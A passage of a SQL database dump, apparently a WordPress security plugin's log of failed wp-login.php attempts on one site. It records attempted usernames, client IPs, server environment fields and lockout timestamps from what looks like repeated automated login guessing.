03:41:30'),(94695,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54619\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050570.6341331;s:12:\"REQUEST_TIME\";i:1746050570;}}','196.251.112.104',1,'2025-05-01 03:32:52','2025-05-02 03:41:30'),(94696,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54620\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050570.6325121;s:12:\"REQUEST_TIME\";i:1746050570;}}','196.251.112.104',1,'2025-05-01 03:32:52','2025-05-02 03:41:30'),(94697,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54616\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050570.606395;s:12:\"REQUEST_TIME\";i:1746050570;}}','196.251.112.104',1,'2025-05-01 03:32:52','2025-05-02 03:41:30'),(94698,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54622\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050570.6382451;s:12:\"REQUEST_TIME\";i:1746050570;}}','196.251.112.104',1,'2025-05-01 03:32:52','2025-05-02 03:41:30'),(94699,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54621\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050570.637444;s:12:\"REQUEST_TIME\";i:1746050570;}}','196.251.112.104',1,'2025-05-01 03:32:52','2025-05-02 03:41:30'),(94700,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47780\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.232.248\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050592.2518489;s:12:\"REQUEST_TIME\";i:1746050592;}}','162.0.232.248',0,'2025-05-01 03:33:14','1970-01-01 00:00:00'),(94701,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54615\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050739.8817489;s:12:\"REQUEST_TIME\";i:1746050739;}}','196.251.112.104',1,'2025-05-01 03:35:41','2025-05-02 03:41:30'),(94702,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54613\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050739.87919;s:12:\"REQUEST_TIME\";i:1746050739;}}','196.251.112.104',1,'2025-05-01 03:35:41','2025-05-02 03:41:30'),(94703,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54614\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050739.880286;s:12:\"REQUEST_TIME\";i:1746050739;}}','196.251.112.104',1,'2025-05-01 03:35:41','2025-05-02 03:41:30'),(94704,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54616\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050739.911027;s:12:\"REQUEST_TIME\";i:1746050739;}}','196.251.112.104',1,'2025-05-01 03:35:41','2025-05-02 03:41:30'),(94705,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54618\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746050739.922385;s:12:\"REQUEST_TIME\";i:1746050739;}}','196.251.112.104',1,'2025-05-01 03:35:41','2025-05-02 03:41:30'),(94706,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44650\";s:11:\"REMOTE_ADDR\";s:14:\"78.155.192.110\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"